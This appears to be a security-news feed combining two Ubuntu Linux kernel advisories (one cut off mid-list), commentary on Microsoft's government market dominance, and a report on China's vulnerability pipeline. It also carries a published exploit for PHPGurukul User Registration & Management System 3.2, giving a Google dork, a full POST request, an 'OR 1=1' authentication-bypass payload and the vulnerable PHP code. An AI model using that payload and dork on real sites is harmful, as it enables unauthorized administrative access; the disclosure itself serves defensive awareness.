Ubuntu Security Notice 6818-4 - Alon Zahavi discovered that the NVMe-oF/TCP subsystem in the Linux kernel did not properly validate H2C PDU data, leading to a null pointer dereference vulnerability. A remote attacker could use this to cause a denial of service. It was discovered that the Intel Data Streaming and Intel Analytics Accelerator drivers in the Linux kernel allowed direct access to the devices for unprivileged users and virtual machines. A local attacker could use this to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6818-4June 18, 2024linux-hwe-6.5 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-hwe-6.5: Linux hardware enablement (HWE) kernelDetails:Alon Zahavi discovered that the NVMe-oF/TCP subsystem in the Linux kerneldid not properly validate H2C PDU data, leading to a null pointerdereference vulnerability. A remote attacker could use this to cause adenial of service (system crash). (CVE-2023-6356, CVE-2023-6535,CVE-2023-6536)It was discovered that the Intel Data Streaming and Intel AnalyticsAccelerator drivers in the Linux kernel allowed direct access to thedevices for unprivileged users and virtual machines. A local attacker coulduse this to cause a denial of service. (CVE-2024-21823)Chenyuan Yang discovered that the RDS Protocol implementation in the Linuxkernel contained an out-of-bounds read vulnerability. An attacker could usethis to possibly cause a denial of service (system crash). (CVE-2024-23849)It was discovered that a race condition existed in the Bluetooth subsystemin the Linux kernel, leading to a null pointer dereference vulnerability. Aprivileged local attacker could use this to possibly cause a denial ofservice (system crash). (CVE-2024-24860)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - ARM64 architecture;   - PowerPC architecture;   - RISC-V architecture;   - S390 architecture;   - Core kernel;   - x86 architecture;   - Block layer subsystem;   - Cryptographic API;   - ACPI drivers;   - Android drivers;   - Drivers core;   - Power management core;   - Bus devices;   - Device frequency scaling framework;   - DMA engine subsystem;   - EDAC drivers;   - ARM SCMI message protocol;   - GPU drivers;   - IIO ADC drivers;   - InfiniBand drivers;   - IOMMU subsystem;   - Media drivers;   - Multifunction device drivers;   - MTD block device drivers;   - Network drivers;   - NVME drivers;   - Device tree and open firmware driver;   - PCI driver for MicroSemi Switchtec;   - Power supply drivers;   - RPMSG subsystem;   - SCSI drivers;   - QCOM SoC drivers;   - SPMI drivers;   - Thermal drivers;   - TTY drivers;   - VFIO drivers;   - BTRFS file system;   - Ceph distributed file system;   - EFI Variable file system;   - EROFS file system;   - Ext4 file system;   - F2FS file system;   - GFS2 file system;   - JFS file system;   - Network file systems library;   - Network file system server daemon;   - File systems infrastructure;   - Pstore file system;   - ReiserFS file system;   - SMB network file system;   - BPF subsystem;   - Memory management;   - TLS protocol;   - Ethernet bridge;   - Networking core;   - IPv4 networking;   - IPv6 networking;   - Logical Link layer;   - MAC80211 subsystem;   - Multipath TCP;   - Netfilter;   - NetLabel subsystem;   - Network traffic control;   - SMC sockets;   - Sun RPC protocol;   - AppArmor security module;   - Intel ASoC drivers;   - MediaTek ASoC drivers;   - USB sound devices;(CVE-2023-52598, CVE-2023-52676, CVE-2023-52609, CVE-2024-26620,CVE-2023-52487, CVE-2023-52465, CVE-2023-52473, CVE-2023-52467,CVE-2024-26583, CVE-2023-52669, CVE-2023-52664, CVE-2023-52449,CVE-2023-52614, CVE-2024-26595, CVE-2023-52611, CVE-2023-52696,CVE-2023-52591, CVE-2023-52491, CVE-2024-35839, CVE-2023-52679,CVE-2024-26607, CVE-2023-52587, CVE-2023-52469, CVE-2023-52608,CVE-2023-52617, CVE-2023-52698, CVE-2024-26673, CVE-2024-35835,CVE-2024-26808, CVE-2024-26668, CVE-2023-52626, CVE-2023-52621,CVE-2024-35837, CVE-2023-52489, CVE-2023-52597, CVE-2024-26649,CVE-2024-26615, CVE-2024-35838, CVE-2023-52693, CVE-2023-52497,CVE-2024-35842, CVE-2024-26618, CVE-2024-26610, CVE-2024-26631,CVE-2024-26644, CVE-2024-26627, CVE-2023-52677, CVE-2023-52472,CVE-2023-52627, CVE-2023-52486, CVE-2023-52632, CVE-2023-52494,CVE-2023-52468, CVE-2024-26634, CVE-2023-52588, CVE-2024-26646,CVE-2024-26584, CVE-2023-52443, CVE-2023-52691, CVE-2024-26612,CVE-2023-52595, CVE-2024-26592, CVE-2024-26623, CVE-2023-52492,CVE-2024-26670, CVE-2023-52583, CVE-2023-52681, CVE-2023-52635,CVE-2023-52457, CVE-2023-52445, CVE-2024-26629, CVE-2024-26594,CVE-2023-52675, CVE-2023-52488, CVE-2023-52446, CVE-2024-26625,CVE-2023-52697, CVE-2023-52453, CVE-2023-52498, CVE-2023-52686,CVE-2023-52593, CVE-2023-52612, CVE-2023-52687, CVE-2023-52470,CVE-2023-52455, CVE-2023-52444, CVE-2024-26608, CVE-2024-26633,CVE-2024-26645, CVE-2023-52451, CVE-2023-52456, CVE-2024-26640,CVE-2023-52670, CVE-2023-52589, CVE-2024-26598, CVE-2024-35841,CVE-2024-26647, CVE-2024-26636, CVE-2023-52680, CVE-2023-52616,CVE-2023-52685, CVE-2024-26582, CVE-2024-26638, CVE-2023-52694,CVE-2024-35840, CVE-2023-52448, CVE-2023-52623, CVE-2023-52462,CVE-2023-52452, CVE-2024-26641, CVE-2023-52683, CVE-2023-52682,CVE-2023-52594, CVE-2023-52490, CVE-2023-52493, CVE-2023-52633,CVE-2023-52606, CVE-2024-26669, CVE-2023-52584, CVE-2024-26585,CVE-2023-52610, CVE-2023-52672, CVE-2023-52450, CVE-2023-52666,CVE-2023-52458, CVE-2023-52622, CVE-2023-52674, CVE-2023-52619,CVE-2024-26586, CVE-2023-52667, CVE-2024-26616, CVE-2023-52463,CVE-2024-26632, CVE-2023-52447, CVE-2023-52692, CVE-2023-52678,CVE-2023-52607, CVE-2023-52618, CVE-2023-52464, CVE-2024-26671,CVE-2023-52599, CVE-2023-52454, CVE-2023-52495, CVE-2023-52690)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS   linux-image-6.5.0-41-generic    6.5.0-41.41~22.04.2   linux-image-6.5.0-41-generic-64k  6.5.0-41.41~22.04.2   linux-image-generic-64k-hwe-22.04  6.5.0.41.41~22.04.2   linux-image-generic-hwe-22.04   6.5.0.41.41~22.04.2   linux-image-virtual-hwe-22.04   6.5.0.41.41~22.04.2After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6818-4   https://ubuntu.com/security/notices/USN-6818-1   CVE-2023-52443, CVE-2023-52444, CVE-2023-52445, CVE-2023-52446,   CVE-2023-52447, CVE-2023-52448, CVE-2023-52449, CVE-2023-52450,   CVE-2023-52451, CVE-2023-52452, CVE-2023-52453, CVE-2023-52454,   CVE-2023-52455, CVE-2023-52456, CVE-2023-52457, CVE-2023-52458,   CVE-2023-52462, CVE-2023-52463, CVE-2023-52464, CVE-2023-52465,   CVE-2023-52467, CVE-2023-52468, CVE-2023-52469, CVE-2023-52470,   CVE-2023-52472, CVE-2023-52473, CVE-2023-52486, CVE-2023-52487,   CVE-2023-52488, CVE-2023-52489, CVE-2023-52490, CVE-2023-52491,   CVE-2023-52492, CVE-2023-52493, CVE-2023-52494, CVE-2023-52495,   CVE-2023-52497, CVE-2023-52498, CVE-2023-52583, CVE-2023-52584,   CVE-2023-52587, CVE-2023-52588, CVE-2023-52589, CVE-2023-52591,   CVE-2023-52593, CVE-2023-52594, CVE-2023-52595, CVE-2023-52597,   CVE-2023-52598, CVE-2023-52599, CVE-2023-52606, CVE-2023-52607,   CVE-2023-52608, CVE-2023-52609, CVE-2023-52610, CVE-2023-52611,   CVE-2023-52612, CVE-2023-52614, CVE-2023-52616, CVE-2023-52617,   CVE-2023-52618, CVE-2023-52619, CVE-2023-52621, CVE-2023-52622,   CVE-2023-52623, CVE-2023-52626, CVE-2023-52627, CVE-2023-52632,   CVE-2023-52633, CVE-2023-52635, CVE-2023-52664, CVE-2023-52666,   CVE-2023-52667, CVE-2023-52669, CVE-2023-52670, CVE-2023-52672,   CVE-2023-52674, CVE-2023-52675, CVE-2023-52676, CVE-2023-52677,   CVE-2023-52678, CVE-2023-52679, CVE-2023-52680, CVE-2023-52681,   CVE-2023-52682, CVE-2023-52683, CVE-2023-52685, CVE-2023-52686,   CVE-2023-52687, CVE-2023-52690, CVE-2023-52691, CVE-2023-52692,   CVE-2023-52693, CVE-2023-52694, CVE-2023-52696, CVE-2023-52697,   CVE-2023-52698, CVE-2023-6356, CVE-2023-6535, CVE-2023-6536,   CVE-2024-21823, CVE-2024-23849, CVE-2024-24860, CVE-2024-26582,   CVE-2024-26583, CVE-2024-26584, CVE-2024-26585, CVE-2024-26586,   CVE-2024-26592, CVE-2024-26594, CVE-2024-26595, CVE-2024-26598,   CVE-2024-26607, CVE-2024-26608, CVE-2024-26610, CVE-2024-26612,   CVE-2024-26615, CVE-2024-26616, CVE-2024-26618, CVE-2024-26620,   CVE-2024-26623, CVE-2024-26625, CVE-2024-26627, CVE-2024-26629,   CVE-2024-26631, CVE-2024-26632, CVE-2024-26633, CVE-2024-26634,   CVE-2024-26636, CVE-2024-26638, CVE-2024-26640, CVE-2024-26641,   CVE-2024-26644, CVE-2024-26645, CVE-2024-26646, CVE-2024-26647,   CVE-2024-26649, CVE-2024-26668, CVE-2024-26669, CVE-2024-26670,   CVE-2024-26671, CVE-2024-26673, CVE-2024-26808, CVE-2024-35835,   CVE-2024-35837, CVE-2024-35838, CVE-2024-35839, CVE-2024-35840,   CVE-2024-35841, CVE-2024-35842Package Information:   https://launchpad.net/ubuntu/+source/linux-hwe-6.5/6.5.0-41.41~22.04.2

Ubuntu Security Notice USN-6818-4

User Registration and Management System version 3.2 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@.:. Exploit Title > User Registration & Management System - SQLi.:. Google Dorks .:.inurl:loginsystem/index.php.:. Date: June 18, 2024.:. Exploit Author: bRpsd.:. Contact: cy[at]live.no.:. Vendor -> https://phpgurukul.com/.:. Product -> https://phpgurukul.com/?sdm_process_download=1&download_id=7003.:. Product Version -> Version 3.2.:. DBMS -> MySQL.:. Tested on > macOS [*nix Darwin Kernel], on local xampp@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#############|DESCRIPTION|#############"User Management System is a web based technology which manages user database and provides rights to update the their details In this web application user must be registered. This web application provides a way to effectively control record & track the user details who himself/herself registered with us."===========================================================================================Vulnerability 1: Unauthenticated SQL Injection & Authentication bypassTypes: error-basedFile: localhost/admin/index.phpVul Parameter: USERNAME [POST]POST PoC #1: http://tom:8080/loginsystem/admin/index.phpHost: tomUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 38Origin: http://tomConnection: keep-aliveReferer: http://tom/loginsystem/admin/index.phpCookie: PHPSESSID=fca5cef217b48f9ec0221b75695e4f2aUpgrade-Insecure-Requests: 1username='&password=test&login=Response: Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, bool given in /Applications/XAMPP/xamppfiles/htdocs/loginsystem/admin/index.php on line 9===========================================================================================Test #2 => Payload to skip authenticationhttp://localhost:9000/loginsystem/admin/index.phpusername=A' OR 1=1#&password=1&login=Response:302 redirect to dashboard.php===========================================================================================Vuln File:/loginsystem/admin/index.phpVul Code:<?php session_start();include_once('../includes/config.php');// Code for loginif(isset($_POST['login'])){$adminusername=$_POST['username'];$pass=md5($_POST['password']);$ret=mysqli_query($con,"SELECT * FROM admin WHERE username='$adminusername' and password='$pass'");$num=mysqli_fetch_array($ret);if($num>0)

User Registration And Management System 3.2 SQL Injection

Forcing Microsoft to compete fairly is the most important next step in building a better defense against foreign actors.

Steve Weber, Professor of the Graduate School, UC Berkeley School of Information

June 18, 2024

4 Min Read

Source: Michael Urmann via Alamy Stock Photo

COMMENTARY

This month, Microsoft president Brad Smith was confronted by the US House Committee on Homeland Security, in a hearing over the cybersecurity woes that have plagued the government as a direct result of the company's security shortcomings. These issues, however, don't just come down to insecure products. They're symptoms of a larger disease — a lapse in market and competition policy that has allowed Microsoft to dominate virtually all of the public sector technology market. And the US government's failure to properly diagnose the deeper cause puts us all at risk. 

Microsoft, by its own admission, is ground zero for state-sponsored hacking groups, and flaws in the company's software have been responsible for a huge proportion of cyber breaches affecting the US government in recent memory. Our country's cyber watchdogs — the Department of Homeland Security's Cybersecurity and Infrastructure Security Agency (CISA) and Cyber Safety Review Board (CSRB) — have spent considerable resources assessing these incidents and trying to assess and address Microsoft's vulnerabilities.

There's a fundamental problem with this process. The government is confusing symptoms — persistent hacks, breaches, and vulnerabilities — with an underlying disease: the lack of competition around cybersecurity. Microsoft has systematically exploited weaknesses in procurement processes to stifle competition and lock government customers into its insecure technology. That confusion ultimately leaves the government's tools to enhance competition on the sidelines, when those tools are the best remedy for cyber insecurity.

Microsoft holds an 85% market share of government collaboration and communications technology and now is awarded at least a quarter of its contracts without any meaningful competition. It's reached this position through a series of deliberate, anticompetitive moves the government has largely neglected. Stretched government procurement officers and chief information security officers (CISOs) are taking the path of least resistance. That's not their fault; it's a difficult consequence of their job. But Microsoft exploits this by making it expensive and difficult to run its software on a competitor's cloud, including charging a five-times premium just to use Word on Amazon's cloud instead of its own Azure cloud service. Microsoft bundles dozens of ancillary applications with its Office productivity apps in its licenses (including Access, Delve, Viva, and others), which stifles competition by linking basic, widely used services with less popular ones and pricing them as free.

The result? A software monoculture with a simple attack surface for the United States' adversaries with nearly a single point of failure: Microsoft. This is a major threat to national security. The potential harm is real and expensive. The US government spent more than $11.1 billion on cybersecurity in 2023, in large part trying to compensate for and respond to the Microsoft incidents that left it vulnerable to intrusion. 

Some lawmakers are ready to take action. Senator Ron Wyden recently drafted legislation that would require the government to set new standards for collaboration software in response to a CSRB report. It's a good step, but it solves only part of the problem. Even if the government can collaborate with other providers while using Microsoft's software, the company's licenses still make it very expensive, all at a major cost to the taxpayer.

**A Better Solution Is Needed**

The government must use all the tools at its disposal to create a more comprehensive solution that immediately targets the root cause of its cybersecurity woes: Microsoft's anticompetitive licensing restrictions. These tools include using the General Services Administration (GSA) to modify procurement processes as a means of bolstering national security. The GSA is responsible for providing agencies with cost-effective, high-quality products from diverse vendors, and the evidence is clear that Microsoft doesn't meet these standards. The GSA can take action by either negotiating better licensing conditions with the company or by looking at other vendors to help diversify the government's tech infrastructure. That would be a strong and timely step to set the stage for more comprehensive and sweeping competition policy action by the Federal Trade Commission (FTC) or the Department of Justice. It's also a step that wouldn't take years to implement — which is vital given the current and future costs of Microsoft's efforts to lock government customers into long-term contracts. The longer the government waits, the harder the lock-in will be to reverse.

It can't settle for identifying symptoms. Microsoft's licensing is responsible for a debilitating disease that has infected our government's tech infrastructure. Allowing major government contracts to be awarded to any one company — in this case, Microsoft — is only plausible if procurement officials believe they really don't have any other choice. But we already have the remedies necessary to level the playing field and make enterprise software vendors accountable for weak cybersecurity. Forcing Microsoft to compete fairly is the most important next step to build a better defense against foreign actors. We have multiple tools to create a level playing field. We just need to use them. 

**About the Author(s)**

Professor of the Graduate School, UC Berkeley School of Information

Steve Weber works at the intersection of technology markets, intellectual property regimes, and international politics He has published numerous books, including The Success of Open Source and, most recently, Bloc by Bloc: How to Build a Global Enterprise for the New Regional Order, and serves as Professor of the Graduate School, School of Information, UC Berkeley. He has worked with and received research funding from a number of technology firms, including Google and Microsoft.

The Software Licensing Disease Infecting Our Nation's Cybersecurity

With the requirement that all vulnerabilities first get reported to the Chinese government, once-private vulnerability research has become a goldmine for China's offensive cybersecurity programs.

Source: Zoonar GmbH via Alamy Stock Photo

China's cybersecurity experts over the past decade have evolved from hesitant participants in global capture-the-flag competitions, exploit contests, and bug bounty programs to dominant players in these arenas — and the Chinese government is applying those spoils toward stronger cyber-offensive capabilities for the nation.

In 2014, for example, Keen Team was the sole Chinese hacking group to take home a prize — scoring 13% of the purse — from the Pwn2Own exploit contest. But by 2017, seven China-based teams collected 79% of the prize money from the contest, according to data from the report, "From Vegas to Chengdu Hacking Contests, Bug Bounties, and China's Offensive Cyber Ecosystem," published last week. The following year, China banned participation in Western contests, gauging the vulnerability information too important to national security.

Its civilian hackers have directly benefited China's cyber-offensive programs and are one example of the success of China's cybersecurity pipeline, which the government created through its requirement that all vulnerabilities be directly reported to government authorities, says Eugenio Benincasa, senior researcher at the Center for Security Studies (CSS) at ETH Zurich, and the author of the report.

"By strategically positioning itself as the final recipient in the vulnerability disclosure processes of civilian researchers, the Chinese government leverages its civilian vulnerability researchers, among the best globally, on a large scale and at no cost," he says.

The open source intelligence report comes as the United States, Australia, Japan, South Korea, and other nations in the Asia-Pacific region have struggled to improve cyber defenses against Chinese advance persistent threat (APT) groups. Earlier this year, high-profile US government officials warned that China was compromising critical infrastructure to pre-position its military hackers for future conflicts. And, in the recently uncovered "Operation Crimson Palace," three different threat teams in China conducted coordinated attacks against a Southeast Asia government agency.

**A Robust Cyber Pipeline**

Starting with university capture-the-flag competitions and ending with exploits that enable military cyber operations, China's pipeline for training civilian hackers highlights the benefits of the country's focus on practical cybersecurity. China's cyber-offensive capability has also significantly benefited from the enforcement of its vulnerability disclosure rule, the Regulations on the Management of Security Vulnerabilities in Network Products (RMSV). Both programs are part of China's overall Military-Civil Fusion (MCF) initiative.

Flow chart showing the pipeline for cybersecurity expertise and vulnerability information. Source: ETH Zurich's "From Vegas to Chengdu Hacking Contests, Bug Bounties, and China’s Offensive Cyber Ecosystem" paper

Focusing its burgeoning numbers of technical graduates on finding vulnerabilities helps amplify its offensive capabilities, says Chris Wysopal, chief technology officer at software security firm Veracode.

"There is a scale difference there. ... They have a large number of technical graduates, and that is being harnessed to find vulnerabilities in \[Western products, such as\] Google Android," he says. "This shows that the incentives are working in their favor, and there's evidence of that."

Two groups of hackers exist within China's cyber-offensive ecosystems. The first group includes vulnerability researchers and offensive security specialists who have distinguished themselves by competing in bug bounty programs and hacking contests, such as the Pwn2Own contest and the Tianfu Cup, which was established as a China-based alternative to Pwn2Own.

The second group consists of the contracted or professional hackers who weaponize vulnerabilities for use in attacks on specific targets. Exploits developed by the first group have often been used by the second, a fact discussed in the iSoon leak earlier this year.

In the past, vulnerability research teams were typically associated with technical groups at large firms, such as Qihoo 360, which has at least 19 teams; the Ant Group, which hosts nine teams; and Tencent, which has at least seven research groups. Today, the researchers often are part of boutique cybersecurity firms.

China's civilian hackers initially obtained training by participating in Western capture-the-flag contests and exploit-development competitions, such as Pwn2Own, as well as bug bounty programs. China now has domestic versions of most of these initiatives and programs, often with the financial backing of top-tier national technical universities.

**Cybersecurity Superstars**

A handful of researchers have made significant contributions to China's programs, highlighting China's reliance on a small group of researchers, according to the report.

More than 50% of Google Android vulnerabilities, for example, are credited to Qihoo 360's Security Response Center (360 SRC), naming Han Zinuo as one of the contributors. When Zinuo moved to cybersecurity firm Oppo, 360 SRC's submissions dropped and Oppo's increased, the research paper stated. Similarly, another researcher, Yuki Chen, accounted for 68% of Qihoo 360's Vulcan researcher group's submissions to Microsoft, and when he moved to boutique firm Cyber Kunlun in 2020, the former firm saw a significant drop in vulnerabilities to Microsoft's bug bounty program, while the latter saw a surge.

Overall, the number of vulnerabilities reported by Chinese firms to the big three US software companies — Apple, Google, and Microsoft — declined starting in 2020. While this could suggest that Chinese firms were no longer reporting the vulnerabilities they discovered, it also coincided with increasing sanctions from the United States, such as the blacklisting of Qihoo 360 in May 2020 due to its links to the Chinese military, the report stated.

"This decrease \[in vulnerability reports has\] raised concerns about the potential loss of a significant channel for vulnerability reporting within the global ecosystem," the report said.

**Downsides for Defense**

Because Chinese teams have curtailed their participation in Western hacking competitions, they have arguably made the competitions less effective as a defensive strategy. In 2022 and 2023, for example, no teams attempted to hack either Apple's iPhone or Google's Pixel at the Pwn2Own competition — that was the first time in 15 years for Apple's iPhone — indicating that China now considers any exploits its experts find as too valuable to demonstrate publicly.

"The notable absence of Chinese hacking teams that specialized in targeting these devices explains this break far better than assuming that the iPhone and Pixel have become unbreachable," the research paper stated. "Concurrently, these vulnerabilities are highly likely evaluated by China's security agencies for potential use in cyber malicious operations."

Even showing such exploits without any accompanying details runs the risk of directing attackers to rediscover vulnerabilities, says Dustin Childs, head of threat awareness for the Zero Day Initiative at Trend Micro, which runs the Pwn2Own competition.

"They have already been demonstrated onstage, so threat actors know they aren’t wasting their time reversing a patch for some that may end up non-exploitable," he says. "This is why we invite vendors to participate in the contest."

Private organizations that deal in exploits act as a bellwether for the vulnerability market. Exploit seller Zerodium currently offers a $2.5 million payday for any hacker that finds a zero-click exploit chain for Google Android and $2 million for a similar attack on iOS.

**China's Own Hacking Competitions**

Meanwhile, China is further divorcing itself from the global information infrastructure, moving its infrastructure to domestically developed technology. Unsurprisingly, its cybersecurity pipeline is following suit, with some major exploit competitions focusing increasingly on Chinese products.

In the long term, China will have to follow two paths, Benincasa says.

"We are observing an interesting shift in China's hacking competitions toward focusing more on their own products, while at the same time maintaining a strong interest in Western ones," he says, adding, "China's strategic intent \[is\] to maintain a presence in international products for offensive purposes, given the expertise of its hackers in targeting Western products, while simultaneously focusing on domestic products for defensive purposes as it gradually reduces reliance on US vendors."

**About the Author(s)**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

Bug Bounty Programs, Hacking Contests Power China's Cyber Offense

Ubuntu Security Notice 6818-3 - Alon Zahavi discovered that the NVMe-oF/TCP subsystem in the Linux kernel did not properly validate H2C PDU data, leading to a null pointer dereference vulnerability. A remote attacker could use this to cause a denial of service. It was discovered that the Intel Data Streaming and Intel Analytics Accelerator drivers in the Linux kernel allowed direct access to the devices for unprivileged users and virtual machines. A local attacker could use this to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6818-3June 14, 2024linux-nvidia-6.5 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-nvidia-6.5: Linux kernel for NVIDIA systemsDetails:Alon Zahavi discovered that the NVMe-oF/TCP subsystem in the Linux kerneldid not properly validate H2C PDU data, leading to a null pointerdereference vulnerability. A remote attacker could use this to cause adenial of service (system crash). (CVE-2023-6356, CVE-2023-6535,CVE-2023-6536)It was discovered that the Intel Data Streaming and Intel AnalyticsAccelerator drivers in the Linux kernel allowed direct access to thedevices for unprivileged users and virtual machines. A local attacker coulduse this to cause a denial of service. (CVE-2024-21823)Chenyuan Yang discovered that the RDS Protocol implementation in the Linuxkernel contained an out-of-bounds read vulnerability. An attacker could usethis to possibly cause a denial of service (system crash). (CVE-2024-23849)It was discovered that a race condition existed in the Bluetooth subsystemin the Linux kernel, leading to a null pointer dereference vulnerability. Aprivileged local attacker could use this to possibly cause a denial ofservice (system crash). (CVE-2024-24860)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - ARM64 architecture;   - PowerPC architecture;   - RISC-V architecture;   - S390 architecture;   - Core kernel;   - x86 architecture;   - Block layer subsystem;   - Cryptographic API;   - ACPI drivers;   - Android drivers;   - Drivers core;   - Power management core;   - Bus devices;   - Device frequency scaling framework;   - DMA engine subsystem;   - EDAC drivers;   - ARM SCMI message protocol;   - GPU drivers;   - IIO ADC drivers;   - InfiniBand drivers;   - IOMMU subsystem;   - Media drivers;   - Multifunction device drivers;   - MTD block device drivers;   - Network drivers;   - NVME drivers;   - Device tree and open firmware driver;   - PCI driver for MicroSemi Switchtec;   - Power supply drivers;   - RPMSG subsystem;   - SCSI drivers;   - QCOM SoC drivers;   - SPMI drivers;   - Thermal drivers;   - TTY drivers;   - VFIO drivers;   - BTRFS file system;   - Ceph distributed file system;   - EFI Variable file system;   - EROFS file system;   - Ext4 file system;   - F2FS file system;   - GFS2 file system;   - JFS file system;   - Network file systems library;   - Network file system server daemon;   - File systems infrastructure;   - Pstore file system;   - ReiserFS file system;   - SMB network file system;   - BPF subsystem;   - Memory management;   - TLS protocol;   - Ethernet bridge;   - Networking core;   - IPv4 networking;   - IPv6 networking;   - Logical Link layer;   - MAC80211 subsystem;   - Multipath TCP;   - Netfilter;   - NetLabel subsystem;   - Network traffic control;   - SMC sockets;   - Sun RPC protocol;   - AppArmor security module;   - Intel ASoC drivers;   - MediaTek ASoC drivers;   - USB sound devices;(CVE-2023-52598, CVE-2023-52676, CVE-2023-52609, CVE-2024-26620,CVE-2023-52487, CVE-2023-52465, CVE-2023-52473, CVE-2023-52467,CVE-2024-26583, CVE-2023-52669, CVE-2023-52664, CVE-2023-52449,CVE-2023-52614, CVE-2024-26595, CVE-2023-52611, CVE-2023-52696,CVE-2023-52591, CVE-2023-52491, CVE-2024-35839, CVE-2023-52679,CVE-2024-26607, CVE-2023-52587, CVE-2023-52469, CVE-2023-52608,CVE-2023-52617, CVE-2023-52698, CVE-2024-26673, CVE-2024-35835,CVE-2024-26808, CVE-2024-26668, CVE-2023-52626, CVE-2023-52621,CVE-2024-35837, CVE-2023-52489, CVE-2023-52597, CVE-2024-26649,CVE-2024-26615, CVE-2024-35838, CVE-2023-52693, CVE-2023-52497,CVE-2024-35842, CVE-2024-26618, CVE-2024-26610, CVE-2024-26631,CVE-2024-26644, CVE-2024-26627, CVE-2023-52677, CVE-2023-52472,CVE-2023-52627, CVE-2023-52486, CVE-2023-52632, CVE-2023-52494,CVE-2023-52468, CVE-2024-26634, CVE-2023-52588, CVE-2024-26646,CVE-2024-26584, CVE-2023-52443, CVE-2023-52691, CVE-2024-26612,CVE-2023-52595, CVE-2024-26592, CVE-2024-26623, CVE-2023-52492,CVE-2024-26670, CVE-2023-52583, CVE-2023-52681, CVE-2023-52635,CVE-2023-52457, CVE-2023-52445, CVE-2024-26629, CVE-2024-26594,CVE-2023-52675, CVE-2023-52488, CVE-2023-52446, CVE-2024-26625,CVE-2023-52697, CVE-2023-52453, CVE-2023-52498, CVE-2023-52686,CVE-2023-52593, CVE-2023-52612, CVE-2023-52687, CVE-2023-52470,CVE-2023-52455, CVE-2023-52444, CVE-2024-26608, CVE-2024-26633,CVE-2024-26645, CVE-2023-52451, CVE-2023-52456, CVE-2024-26640,CVE-2023-52670, CVE-2023-52589, CVE-2024-26598, CVE-2024-35841,CVE-2024-26647, CVE-2024-26636, CVE-2023-52680, CVE-2023-52616,CVE-2023-52685, CVE-2024-26582, CVE-2024-26638, CVE-2023-52694,CVE-2024-35840, CVE-2023-52448, CVE-2023-52623, CVE-2023-52462,CVE-2023-52452, CVE-2024-26641, CVE-2023-52683, CVE-2023-52682,CVE-2023-52594, CVE-2023-52490, CVE-2023-52493, CVE-2023-52633,CVE-2023-52606, CVE-2024-26669, CVE-2023-52584, CVE-2024-26585,CVE-2023-52610, CVE-2023-52672, CVE-2023-52450, CVE-2023-52666,CVE-2023-52458, CVE-2023-52622, CVE-2023-52674, CVE-2023-52619,CVE-2024-26586, CVE-2023-52667, CVE-2024-26616, CVE-2023-52463,CVE-2024-26632, CVE-2023-52447, CVE-2023-52692, CVE-2023-52678,CVE-2023-52607, CVE-2023-52618, CVE-2023-52464, CVE-2024-26671,CVE-2023-52599, CVE-2023-52454, CVE-2023-52495, CVE-2023-52690)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS   linux-image-6.5.0-1021-nvidia   6.5.0-1021.22   linux-image-6.5.0-1021-nvidia-64k  6.5.0-1021.22   linux-image-nvidia-6.5          6.5.0.1021.29   linux-image-nvidia-64k-6.5      6.5.0.1021.29   linux-image-nvidia-64k-hwe-22.04  6.5.0.1021.29   linux-image-nvidia-hwe-22.04    6.5.0.1021.29After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6818-3   https://ubuntu.com/security/notices/USN-6818-1   CVE-2023-52443, CVE-2023-52444, CVE-2023-52445, CVE-2023-52446,   CVE-2023-52447, CVE-2023-52448, CVE-2023-52449, CVE-2023-52450,   CVE-2023-52451, CVE-2023-52452, CVE-2023-52453, CVE-2023-52454,   CVE-2023-52455, CVE-2023-52456, CVE-2023-52457, CVE-2023-52458,   CVE-2023-52462, CVE-2023-52463, CVE-2023-52464, CVE-2023-52465,   CVE-2023-52467, CVE-2023-52468, CVE-2023-52469, CVE-2023-52470,   CVE-2023-52472, CVE-2023-52473, CVE-2023-52486, CVE-2023-52487,   CVE-2023-52488, CVE-2023-52489, CVE-2023-52490, CVE-2023-52491,   CVE-2023-52492, CVE-2023-52493, CVE-2023-52494, CVE-2023-52495,   CVE-2023-52497, CVE-2023-52498, CVE-2023-52583, CVE-2023-52584,   CVE-2023-52587, CVE-2023-52588, CVE-2023-52589, CVE-2023-52591,   CVE-2023-52593, CVE-2023-52594, 